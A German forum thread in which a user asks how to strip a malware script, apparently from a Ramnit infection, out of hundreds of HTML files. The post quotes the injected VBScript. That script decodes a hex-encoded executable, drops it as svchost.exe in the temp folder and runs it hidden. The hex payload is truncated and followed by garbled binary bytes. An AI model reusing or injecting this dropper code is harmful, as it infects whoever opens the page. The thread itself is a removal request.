![]() |
|
Plagegeister aller Art und deren Bekämpfung: Malware Script aus HTML Datein entfernenWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
![]() | #1 |
| ![]() Malware Script aus HTML Datein entfernen Hallo, ich hatte mir vor einige Zeit einen Schädling eingefangen, der u.a. .dll/ .exe und .html/ .htm Dateien beschädigt hat. Den Übeltäter selber konnte ich wieder los werden, das System ist momentan "sauber", bin mit diversen Progs drüber. Nur die veränderten .html und .htm Dateien bekomme ich nicht sauber, ohne jetzt manuell an zich Hunderte Dateien ran zu müssen, habe auch keine weiteren Sicherungen und die Dateien sind mir sehr wichtig. Habe es auch schon hiermit versucht, leider ohne Erfolg: hxxp://polygoncell.blogspot.de/2010/08/i-got-infection-of-virus-on-my-pc-last_7746.html Das o.g. Programm greift nicht auf Unterordner zu und fixt auch nicht gefundene Dateien, zumindest bei mir unter Win Vista nicht. Dieser Script selber fügt sich in besagte Dateien in den letzten Absatz mit ein, sieht dann in etwa so aus: HTML-Code: </html> <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D000000000000000000000000000000000000000000000000504500004C010600000000000000000000000000E0000F0 Dieser Zahlenreihenfolge geht dann ellenlang weiter (ist jetzt nur ein Ausschnitt) dann hört es nach den ganzen Zahlen auf mit: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D28EB95B3907F22C0DB13C94688D6548BE9B82A500A07017BB983BDB80711060B9D4E83011780E89E57DD485366277C80E6170F780F35120B425F77F302B55F7A8326446708C542EA0D0D48422BCCF85496C72DEF49B0B4DC9849175821FF02CFD8EC3B93CEB8D9FF9410ED8607270C01CF4D24B358279C0F78674CA45C69A7E82E7DC260BF647741C05C71603A75C6D8F06D552F35E11EE7538B0BAEBD0759A92789E7C326A4058F519876638910A5EA8F4FE3177084CE8370D62EAFD50606B2AB24E904ACFD5455C3AEC847EA59F3CD2B3CC9DEB4CF85937F559F3A938FE148E03AE79EDDCC11F802DD1CD142F759EE765931E8A7927E3C0DF2AD1B5ED184203672D701536910A97D8DCC9C1643C27E7432D7B17F669D14D36B08B39262ABBF94081C99A4203A76B1640D63A2A1510E063BF66F53AB040AEB9849DD3909C58F8ADDFA3FB912AF1388AD0A5FB912AA7FB912AA6FB912A2CD2D967C007D56489EC912AA5FB912A" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT><!--�<�� K������ ��4��̶�ERe~����_�<�خ��Y=�V!�5]db�2�f�S��歹J�/sɂֈ��{�ЮW�J2S��ⶄ�����饞��i�X$J� �\�;R��ϫt� �~,���E-�V���PP�Fu\��$?%<y����=�BMa�!��\cõv�=�a�]C�q�&o:��8�*�e,��o;}�a��eW!J�絈���������GO���˾�c���L@�j7��6b^^������G��^Q��|e�=�z zP���u�[�ݖS��35���_��o�=��4O� 8��WζA���Ne>���(H �fR}��f�f�f��.NgS�PZ=f �f--> Habt ihr eine Idee oder einen Tipp (anderes Programm o.ä.) wie ich meine gesammten Laufwerke nach html und htm Dateien mit diesem Script absuchen und automatisch entfernen lassen kann ![]() |
Themen zu Malware Script aus HTML Datein entfernen |
anderes, automatisch, beschädigt, dateien, diverse, eingefangen, entfernen, laufwerke, malware, programm, schädling, script, svchost.exe, system, vbscript, versucht, virus.win32.ramnit.a, worm.win32.ramnit.a |